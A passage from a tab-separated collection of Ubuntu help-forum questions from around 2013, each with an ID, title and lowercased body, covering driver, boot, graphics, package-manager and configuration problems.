3.2 version with which i ca n't get the bumblebee daemon started . what to do ? i 'm sure i forgot to say something ... : p thanks in advance ,
373164	no network devices on ubuntu 13.10	i 'm brand new to ubuntu and therefore am the noobest of noobs . i hope someone can help . i 've just installed 13.10 on my dell inspiron 6400 . when installing the software , my wired internet connection worked . however , when installation completes , neither my wired or wireless connections work . my understanding so far is that it seems i do n't have my broadcom bcm4401 ( ethernet controller ) or broadcom bcm4311 ( network controller ) drivers installed . i 've managed to download these drivers from my windows pc , but it appears i need synaptic package manager to install them on my ubuntu laptop , which itself requires internet access to install . does anyone know how i can get my internet access up and running ? thanks
373167	how to prevent ubuntu from suspend	i have a problem with automatic suspend in my ubuntu . i have following settings but even that i have plugged computer in it is suspended how to fix this ?
373168	hud not working in nautilus in ubuntu 13.04/13.10	hud feature is not working for nautilus , document viewer etc which application switch menu to right side or does n't support global menu ( eclipse ) . is there any way to support hud for new application at least which switch there menu from global menu to right side ? system : ubuntu 13.10 64bit gnome nautilus 3.8.2 document viewer 3.10.0
373169	ubuntu13.10 64 bit installed alongside windows 7 32bit does n't boot	i have installed ubuntu 64-bit alongside windows 7 32-bit . ( windows installed first . ) the installation was successful , but when i restart it just goes directly to windows 7 without any sign of existence of ubuntu . i 'm a beginner who just wanted to get familiar with ubuntu , but now i 'm disappointed with it . someone told me the not booting problem is related to efi , but now i 'm scared to play with this boot stuff because my information might be totally lost . how can i fix this boot problem and get to ubuntu ?
373170	moving home to new partition	greetings ~ i have set up a hard drive partition for data , docs and personal files to prevent losing them in case i ever have to re~install the os ( ubuntu 12.04 ) . now i need to move these directories to the new partition and have the os and software recognize the new location by default . could this be as easy as drag/drop ? if now , what steps are recommended ? thank you !
373171	enter terminal mode with bash command	is there a possibility to enter the terminal mode accessible with ctrl+alt+f1 with a bash command so that i can tell a script to do so ?
373172	sharkk wireless mouse not working in ubuntu 13.10	i have a sharkk high precision laser mouse that i could n't get to work with ubuntu . it works in win 8 pro though . the touchpad and keyboard were still working . i did something with xorg.conf ( following an ehow procedure ) but that caused my computer to stop working , so i had to do a fresh install using a usb created by pendrivelinux , but the mouse does n't work still . i ran hardinfo and it showed me that the transceiver is made by telink semiconductor . can anyone help me , plz ?
373176	ca n't log in - cycles through black screen	same problem : ubuntu 12.04 lts . returns to the login screen in all gui modes despite i enter the correct password . solution found in this blog - log with guest user ctrl+alt+f1 to log as i could n't log before , or if preferred as root . rm /home//.authority to remove this file ctrl+alt+f7 to go back to guest session and try to log as > > > > success thanks a lot to everybody and specially to lili
373185	cd/dvd player not reading data cd 's	in ubuntu 12.04 on a dell latitude d630 laptop the cd/dvd player can read music cd 's and movie dvd 's and when a cd or dvd is inserted the device is properly listed under 'devices ' section on the file manager . however when i insert a cd with only data ubuntu is not reading the cd and the device is not listed at all . can you please advise how to solve this problem ? i tried to mount the cd manually with the command line 'sudo mount /dev/cdrom /media/cdrom ' but i get the error message 'mount : no medium found on dev/sr0 . any idea ?
373186	dell e6400 fn f8 does not work ; lcd/projector connected to vga port not recognized	brand new to linux/ubuntu , but loving it so far . i have 12.04 installed on a dell lat e6400 and everything is fantastic . except the fact that the laptop will not seem to recognize any type of lcd or projector connected to the vga port . i have the proprietary nvidia driver that ubuntu recommended installed . when i go to displays , i only see the laptop . when i hit fn+f8 , i do not even see the typical screen flicker as the laptop tries to switch displays . vga worked fine in win xp . i have read multiple threads on similar topics , but they all seem to go off in different directions or involve use of a docking station . i am just trying to get my vga port to output to a projector or lcd . how can i fix this ?
373188	how to repair libusb ?	i have a problem with libusb in my ubuntu 12.04 32bit . when i install it from apt-get install libusb-1.0-0 libusb-1.0-0 it is not detected by programs i install from source , i.e . gnuradio and also when i run ls -al /usr/lib/libusb* i do n't see any libraries . so i installed libusbx from source ( now i can see it in /usr/lib/ ) but that is causing me problems , and prints errors like : fusb : :_reap libusb_handle_events ( ) -10 and usb does n't work . in the old days i think the library was called libusb-1.0 and not libusb-1.0-0 . why do i not see a library in /usr/lib/ when i install it with apt-get ? is there a way to get libusb-1.0 and not libusb-1.0-0 ? is there a procedure to repair it once and forever ? i never had a problem with this , so excuse me if i do n't get it right here .
373189	installing libc6 : i386 on ubuntu 13.10 64-bit tries to kill init	when i try to install libc6 : i386 with sudo apt-get install libc6 : i386 on a multiarch enabled 64bit ubuntu 13.10 system , with kernel 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 i reproducibly get a kernel panic with the message : kernel panic - not syncing . attempted to kill init ! exit code=0x0000008b what is wrong ?
373191	mapping network drives on logon	i 'm attempting to prepare some laptops for use in our school district with ubuntu . i have them on the domain , and you can login with your aduc credentials no problem . however , i 'm stuck at what appears to be a large hurdle for some folks , mapping ad defined `` homedirectorys '' on log in . i can use the command adquery to find information about users in my directory adqury user -b homedirectory $ user will give me the contents of the home directory field in ad for the current user . \\server\students\2015\doej15 now , i 'm a novice at using linux , but i like to think i can grasp a language pretty quick . i need to find a way to take this information that i know i can pull , and script it so it uses that information to mount a folder from our network . if anyone has done something like this before i 'd love to hear how you solved it . i ca n't just simply map to \server\students\2015\ $ user because many of our users home folders are organized by either year of grad , or work position ( staff , teachers , administrators , ... )
373194	what is the correct software to open a .tar file ?	i want to be able to play the game n , but i ca n't figure out what to use other than archive manager to open it . here is the link to the game download .
373196	install iraf on ubuntu 13.10 64 bit	i installed ubuntu 13.10 64 bit . now i want to install programme iraf , which is running on 32 bit system . and i can not install ia32-libs . sudo apt-get install ia32-libs this is not working what to do , so the programme will work ? i tried so many different things , but nothing works ... do i have to install ubuntu 13.10 32 bit or is there any other sulution ?
373199	failed to load module `` unity-gtk-module '' by skype in ubuntu 13.10	when i run skype from terminal this message appear , but skype run successfully . i have checked that unity-gtk-module is installed in my system and required lib files are available but in 64 environment . there is not package named unity-gtk-module : i386 . i have created a soft link of appropriate lib to /usr/lib but skype return elf class error ( not 32bit lib ) . i also set gtk_path but still not working . how to install 32bit version of library for unity-gtk-module ? export gtk_path=/usr/lib/x86_64-linux-gnu/gtk-2.0/modules/
373202	has anyone got ubuntu touch working on nexus 5 ?	i have been debating whether to get a nexus 5 phone since it came out . my only fear is that i wo n't like android . i love ubuntu , i know that i 'd love ubuntu . so i have a few question related to ubuntu touch : is it easy or possible to switch between ubuntu touch and android ? would i have to keep hacking the phone ? can i dual boot them ? would i lose my data every time i switch ? the nexus 5 is n't mentioned here : https : //wiki.ubuntu.com/touch/devices does that mean it simply wo n't work if i follow the porting instructions ? would i have to do a bit of hacking ? has anyone got it working ? will it eventually be supported ?
373203	background 's parallax effect on changing workspace	i was wondering that is it possible to add parallax effect to background and when you change work-space , the background moves a bit , like it does when you change home-screen on a mobile phone .
373205	can not access secondary gui	i have an asus laptop with intel i5 and nvidia 740m optimus card , and i can make bumblebee funcion , can anyone help . or if you have another way to help me without bumblebee i would be greatful
373207	installing both lxml 3.1.2 and lxml2 on ubuntu 12.04	i asked this on so : http : //stackoverflow.com/questions/19852911/lxml-3-1-2-and-lxml2-both-on-ubuntu/19856674 # 19856674 but it is perhaps more appropriate for askubuntu . so here it is again , reformulated . on the lxml site they suggest that it is possible to have both lxml2 and the newest version of lxml on ubuntu : using lxml with python-libxml2 if you want to use lxml together with the official libxml2 python bindings ( maybe because one of your dependencies uses it ) , you must build lxml statically . otherwise , the two packages will interfere in places where the libxml2 library requires global configuration , which can have any kind of effect from disappearing functionality to crashes in either of the two . to get a static build , either pass the -- static-deps option to the setup.py script , or run pip with the static_deps or staticbuild environment variable set to true , i.e . static_deps=true pip install lxml the staticbuild environment variable is handled equivalently to the static_deps variable , but is used by some other extension packages , too . i am generally confused about how pip packages and ubuntu packages get along , so i hesitate to run static_deps=true pip install lxml . will it damage/confuse my installed lxml2 package ? the suggestion on so was to install the new lxml in a virtualenv . that looks like the best way to go , but the lxml site is suggesting that a dual installation will work also . in general : what happens if i use pip ( to get a newer install ) for a package that is already installed by apt-get ?
373208	video playback works only as root using a nvidia card	that is , video playback with anything : chrome ( html 5 ) , firefox ( flash ) , vlc , totem , smplayer ... whatever . it works only if the software is started as root otherwise it freezes at the begin interesting enough , in chrome , you can move the slider to whatever position and see the current frame updated . however the video stay still . this started to happen a couple of days ago after an unidentified update . relevant output from chrome run as normal user gives some hint : nvidia : could not open the device file /dev/nvidia0 no output coming from firefox or vlc $ ls -l /dev/nvidia0 crw-rw-rw- 1 root root 195 , 0 nov 8 21:18 /dev/nvidia0
373209	dell xps 15 showing a monitor that does n't physically exist	for some reason my dell xps 15 claims that i have two monitors , and when i connect my hdmi to the tv it says i have three monitors . the `` unexisting '' monitor only goes to 1024x768 , so when i try to mirror my monitors ( with the hdmi connected ) i 'm only able to have 1024x768 resolution . does anyone know what can be done to remove the montor that does n't exist . i have ubuntu 13.10 .
373210	ubuntu 13.10 screen flashing and is not going to login screen after i installed amd catalyst driver	so i installed the amd catalyst driver , rebooted and then the screen started to shift between black screen and normal screen every ~5 sec . also it does not go to the normal login screen anymore .
373211	will ubuntu touch support the new nexus 5 ?	will ubuntu touch support the new nexus 5 ? if yes ... when ? thanks in advance ; - )
373213	launcher does not hide after upgrade to 13.10	i have made a video , showing that no matter what i do , launcher is still there . video on youtube
373214	is ubuntu recognizing and/or using my nvidia graphics card ?	this is my first post here , and i 'm pretty new to ubuntu/linux . i currently have no other os except for ubuntu 13.10 . ( i used to have win7 until i got a new terabyte hard drive ) . my current pc build , if any of this helps : cpu : intel i5 quad-core graphics : nvidia geforce gtx 650 ram : 8 gb hdd : 1 tb sata 3 motherboard : msi z77 a-g41 os ubuntu 13.10 so i recently installed ubuntu 13.10 and put steam on it , and i 'm seeing that my games run a lot slower than they did when i had win7 . i figured it was a graphics problem , so i checked system settings > details > overview . it says in `` graphics '' that i have `` gallium 0.4 on nve7 '' ( do n't really know what that is ) . does this mean that ubuntu is not using my graphics card ? in system settings > software & updates > additional drivers , it clearly shows like this : nvidia corporation : gk107 [ geforce gtx 650 ] -this device is using an alternative driver ( and then it shows a list of drivers that i can switch back and forth to ) so this is a bit confusing . in software and updates , it clearly shows that i have my nvidia card installed , and that i have a driver selected for it . but in system settings , it shows i have some gallium 0.4 thing . i had done a bit of research , and ended up typing command : '' lspci|grep vga '' in the terminal . it showed this in response : vga compatible controller : nvidia corporation gk107 [ geforce gtx 650 ] ( rev a1 ) the terminal seems to recognize my graphics card . what it looks like to me , is that i do n't have the proper driver , and i might be using my cpu 's integrated graphics . when i switch around which driver i am using in that list , it still does not see my card in system settings . some of the drivers in the list give me some sort of opengl error when i try to run a game . it might just be that my games are running slow because the game developers have not optimized it for ubuntu that well . however , that still does n't take away from the fact that system settings is not showing my nvidia card . tl ; dr version : how do i know if my video card is being recognized/used ? if my video card is not being used , what is the best way fix that ? please make your answers easy to understand . i do not mind wordy responses , as long as i can follow what you 're saying . any help would be greatly appreciated ! thanks , jabber5
373218	keeping local folders synchronized	after repeatedly losing data on encrypted drives due to some trivial combination of software and hardware failure , i would like to know if there is a simple tool that keeps local folders synchronized . like a local `` cloud '' service that runs on one computer and synchronizes any changes in one folder to the other folder as soon as both folders are available . that way i can keep a copy of the most important files on a different hard-drive .
373222	problems increasing root size	i 'm running out of space , so i tried to increase root size using this link : increase size of root partition after installing ubuntu in windows here is the output filesystem type size used avail use % mounted on /dev/sda7 ext4 6,2g 5,6g 308m 95 % / udev devtmpfs 965m 4,0k 965m 1 % /dev tmpfs tmpfs 389m 892k 388m 1 % /run none tmpfs 5,0m 4,0k 5,0m 1 % /run/lock none tmpfs 972m 440k 971m 1 % /run/shm /dev/sda5 fuseblk 12g 6,1g 5,8g 52 % /media/ubuntu /dev/sda2 fuseblk 278g 260g 19g 94 % /media/ac4cc70d4cc6d16e i tried to allocate 16gb in the host ( /dev/sda2 which is windows 7 partition ) . when i get to the \ubuntu\disks folder , i only get the `` new.disk '' file which weighs the 16gb allocated and not the `` root.disk '' file too . also , the /dev/sda7 size does n't increase . could you please help me ? many thanks
373228	what is the `servername` attribute for apache2 and what does it do ?	i do not know what this config setting means . does it mean that it registers a domain name ? is it like dns ? here is what i have for my apache2 default config servername staugie.org serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks indexes multiviews allowoverride all < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride all options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > also , is there any way to register a free domain through the apache foundation ?
373231	can not open software center or use apt-get install	i have been trying to get it working for over an hour and a half now , the code below is what i keep getting . the example is from me trying to install synaptic , but i get the errors on most apt-get commands and update manager . sudo apt-get install synaptic reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/wine.budgetdedicated.com_apt_dists_edgy_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . this is what i get when i type software-center in the terminal : d6 @ d6-desktop : ~ $ software-center 2013-11-08 16:13:58,317 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-11-08 16:13:58,323 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-11-08 16:13:58,812 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-11-08 16:13:58,989 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-11-08 16:13:59,164 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/wine.budgetdedicated.com_apt_dists_edgy_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . 2013-11-08 16:14:05,002 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' d6 @ d6-desktop : ~ $ traceback ( most recent call last ) : file `` /usr/share/software-center/update-software-center-agent '' , line 73 , in < module > cache = apt.cache ( memonly=true ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/wine.budgetdedicated.com_apt_dists_edgy_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened .
373233	transmission sort files alphabetically by default ?	the first thing i usually do when interacting with files view is to sort them alphabetically . it gets tedious after a while . is there some configuration option to turn on sorting by default ?
373234	shotwell - color adjustments box location	as part of upgrading to ubuntu 13.10 i got the new shotwell 0.15 which works fine for me ... except ... every time i open the color adjustment box it appears at the bottom of my screen , mostly invisible , and i have to drag and drop it to some other place on the screen where i can actually see and use it . this is getting pretty annoying pretty fast . everything else seems to work at least as well as with my previous shotwell version though .
373235	unity locks up in live cd	i 'm trying to run from the live usb to install ubuntu 13.10 on my windows machine ( as i 've grown a touch sick of windows ) . however , whenever i boot into the liveusb session after a few moments the unity desktop locks up ( except the mouse pointer , which i can move ) . is this something to do with the fact i 've got an nvidia 580 gtx ? i 've heard of issues with ubuntu and this card . i 've also got an ssd , but given that it 's booting from usb i should n't think that 's an issue . system specs : processor : intel core i7-2600k cpu @ 3.40 ghz motherboard : asus maximus iv gene-z z68 socket 1155 ram : 8gb ddr3 gpu : asus nvidia 580 gtx
373238	node-hid does n't see a xbox controller - ubuntu 12.04.03	i am trying to get node-hid to display information information on an xbox controller . it can display info on other hid devices such as a mouse just fine but when i run the below code with an xbox controller all i get back is a blank array . var hid = require ( 'node-hid ' ) ; console.log ( hid.devices ( ) ) ; when i run lsusb i can see my controller as : device 004 : id 1bad : fa01 harmonix music
373240	ubuntu 12.04 getting error during install [ 297.952003 ] microcode	i 'm trying to set up a ubuntu vm but i 'm getting this error during install : [ 297.952003 ] microcode : cpu0 : update failed for patch_level=0x5000119d-upgrade bios or use force_addr=0xaddr i tried making a new machine and starting install again but getting same error . any thoughts ?
373241	ata2.00 : srst failed ( errno=-16 )	last week end i re-installed ubuntu 12.04 from a cd , so the cd-rom was working then and was seen by the computer , though it would n't mount once ubuntu had booted . does opening the cd drive without un-mounting the drive change some setting ? earlier today the bios advanced menu showed sata3g-1 as the mother board and sata3g-2 as atapi ihas124 y atapi , which i think is the cd-rom . i want use live ubuntu to see how the computer recognized the cd-rom , but now even the bios is not showing anything . checking atapi ihas124 on the web suggests there might be a driver problem for this cd-rom . the solutions are windows , so no good to me . sorry that the only terminal data i have is : 42.514978 ] ata2.01 : hard resetting link [ 43.541974 ] ata2.01 : failed to resume link ( scontrol 0 ) [ 43.890759 ] usblp0 : removed [ 43.892550 ] usblp 2-1.5:1.1 : usblp0 : usb bidirectional printer dev 5 if 1 alt 0 proto 2 vid 0x03f0 pid 0x4d11 [ 50.746971 ] ata2.00 : srst failed ( errno=-16 ) [ 50.746977 ] ata2.00 : hard resetting link [ 52.972816 ] ata2.01 : hard resetting link [ 53.999839 ] ata2.01 : failed to resume link ( scontrol 0 ) [ 54.010519 ] ata2.00 : sata link down ( sstatus 1 scontrol 330 ) [ 54.010531 ] ata2.01 : sata link down ( sstatus 0 scontrol 0 ) [ 54.010552 ] ata2 : eh complete
373242	how to remove a strange-looking directory	i have a directory in my home dir , but i am unable to remove it in any ways . using rm -rf jsz-r6k.50/ crashes the konsole . i also tried to use sudo rm , but it is the same . drwxr-xr-x 3 volkan volkan 4096 nov 5 03:19 .installjammerinfo/ drwxrwxr-x 4 volkan volkan 4096 aug 6 15:28 .java/ drwxr-xr-x 2 volkan volkan 86122496 nov 8 22:25 jsz-r6k.50/ drwx -- -- -- 5 volkan volkan 4096 nov 8 02:58 .kde/ how can i remove this directory ? edit : volkan @ ubuntu : ~ $ lsattr -d jsz* -- -- -- -- -- i -- e -- jsz-r6k.50 edit for omps : i moved the file into /var/tmp/newname , but i can not remove it from there either . the following commands failed also , they freezed the console . only the lsof command gave the following : command pid user fd type device size/off node name bash 3935 volkan cwd dir 8,6 86122496 914129 new rm 4177 volkan 3r dir 8,6 86122496 914129 new rm 4177 volkan 4r dir 8,6 86122496 914129 new
373243	firefox ca n't access to the internet , bu everything else can	i do n't see why i ca n't access the internet when i run firefox in ubuntu 13.10 , i was previously able to until i resolved an issue where the software updater gave me a repository download error . now the message is gone , the updater works fine , but the internet connection does not even when it says i am connected to the wifi . what 's wrong ? is it a re-install the only viable option ? i do n't have any data on it .
373244	ubuntu server 12.04 lts use many memory	i have installed ubuntu 12.04 on a cloud server ( based on vmware ) . system start normaly with about 300mb of memory , after 20 minutes begin to load memory and i see 3gb of memory usage . i do n't find which process use this memory , i have tried with htop too . any idea ?
373246	openconnect command	i am trying to access my pc on office using openconnect , however it gives me attempting to connect to hostip:443 failed to connect to host hostip failed to open https connection to hostip failed to obtain webvpn cookie this is what i 'm using : openconnect -c filename.pfx hostip
373247	`` the system is running low-graphics mode '' how do i fix this ?	i get `` the system is running in low-graphics mode . your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself '' . i have an old computer . i do n't even know if it has a graphics card .
373250	discontinuous vlc playback under 13.10	since system upgrade to ubuntu 13.10 i have discontinuous playback with current vlc player version even for low-mid quality avi files . tried to reinstall vlc several times using different install methods , installed the restricted extras with codecs also , no success fixing the problem . any one experiencing the same ? any ideas how to fix the playback ?
373251	what linux distro should i get for old laptop	its a windows xp for now so any how to tell how to do it in xp my old laptop : intel ( r ) celeron ( r ) m processor 1.40 ghz and 224 mb of ram
373254	terminal command repeated twice to work	i am very new with linux and ubuntu . installed it in vmware player yesterday and i 've been watching some good command tutorials . i 've installed mysql and php and some stuff . i 've created a database and a table and been trying to play around a bit with the command and such . now i noticed that i must enter a command twice to it to work , the first time i use it , it triggers an error . ( this is only in the mysql area ) check this out : first i tried : mysql > \g use my_database error : no query specified then i tried it again : - > \g use my_database query ok , 0 rows affected ( 0.00 sec ) why is this happening ? is it a bug ? or are there some reasons for this behavior ?
373256	how to get full conky transparency in kde 4.11 ?	on recent versions of kde ( 4.10 , 4.11 at least ) , the conky window does not have a transparent background , despite settings in the .conkyrc file .
373259	writing ( `` injecting '' ) text into existing ubuntu terminal	given the name of an already running terminal ( gnome-terminal maybe ? ) , is there a way to write text into it from another program ? i am basically looking for a way to start compilation from a text editor .
373260	ubuntu 12.04 64bit ca n't connect to wpa2 personal wifi	recently moved back to ubuntu from mint and discovered that ubuntu does n't want to connect to my wifi . it just keeps trying and trying , asking for password time after time $ sudo lspci -vv -s 02:00.0 02:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : azurewave aw-ne785 / aw-ne785h 802.11bgn wireless full or half-size mini pcie card physical slot : 1 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at d2c00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2- auxcurrent=375ma pme ( d0+ , d1+ , d2- , d3hot+ , d3cold+ ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit- address : 00000000 data : 0000 capabilities : [ 60 ] express ( v2 ) legacy endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 512ns , l1 < 64us exttag- attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr+ uncorrerr- fatalerr- unsuppreq+ auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , latency l0 < 512ns , l1 < 64us clockpm- surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : not supported , timeoutdis+ devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : 2.5gt/s , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -6db capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes+ tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap+ cgenen- chkcap+ chken- capabilities : [ 140 v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 160 v1 ] device serial number 00-15-17-ff-ff-24-14-12 capabilities : [ 170 v1 ] power budgeting < ? > kernel driver in use : ath9k kernel modules : ath9k
373263	how to install django 1.6 ?	appears to be installing django 1.3.1 in ubuntu 12.04 . how can i get django 1.6 installed ? sudo apt-get install python-django
373264	installed server 13.10 - no keyboard after reboot	i installed ubuntu 13.10 server on an asrock e350m1 itx computer . the install went ok and i was able to use the keyboard during the entire process . the keyboard is connected via ps2 connection . however , once i completed the install , and rebooted i was unable to type in my user name at the login prompt . the keyboard does not work . if i reboot and go into the bios , the keyboard works so the ps2 connection is ok .
373265	laptop install video mode problem . can not read screen	initial install of ubuntu 12.04 by linux newbie . install from cd ; esc to select language ; select install ubuntu ; start install purple text screen is fine ; then a black screen the the graphics display starts and is unreadable . full of blocky artefacts tried the above with both f6 to set parameter vga=771 and nomodeset neither made any difference i 've even tried running the load process under windows ( where the graphics work fine ) . although i get a complete installation , when i boot the graphics are 'odd ' ( top half of screen mostly ok except mouse is black and leaves a permanent trail which is wiped out with the next mouse pass bottom half of screen is unintelligible block and other artefacts as when installing from cd . recovery mode failsafe graphics tells me system is running in low graphics mode but does n't seem to let me do anything about it ( newbie so i 'm not sure what i should try but the things i did try made no difference . ) seems clear i need some drivers but where do i get them and how do i get then installed . the graphics are graphics is supersavageâ˘/ixc 1,024 x 768 pixels 16.7m colours thanks for any help
373270	can i install ubuntu downloader on my laptop , transfer it to a usb and install it on my desktop	i have installed the ubuntu downloader on my laptop but it want the program on my desktop . my desktop doesnt have any internet at the moment which is why im doing it this way , its only opening up an iso file in an image burning app when i click the installer , please help ?
373272	will ubuntu work on my ancient , pre-pentium powermac g4 tower ?	sorry if i 'm repeating someone else 's question but i 'm a techno-illiterate , ... . no formal computer training of any kind . i need simple answers that are n't loaded with `` terminology '' , please . i use firefox and thunderbird and the email pkg . provided by a local company called novus communications . they also handle my landline and tv cable . they use fibre optic cabling if that 's of any use . if you 're from vancouver , canada you probably know of them . my mac was given to me and i did not know enough then to get the first owner 's username and password so there 's lots of downloadable stuff which i 've never been able to dpownload . argh ! but it gets worse , ... . and it explains why i assume that very soon i 'll no longer be able to use this old girl 's 10.4.11 os . the internet now tells me it will no longer support either the t.bird or the firefox . a friend tells me that since i can not afford a new or even a 2nd hand new mac that ubuntu may yet buy me some more years of use from this old , pre-pentium powermac g4 . help ! paul from vancouver , ca
373274	i need help with my ubuntu	i work @ a motel6 and we use ubuntu on our desktop computer for the guest . my question is how do i connect to the internet ? how can i get to the network server ? it just keep saying server can not connect ! could you please help me get it to work ?
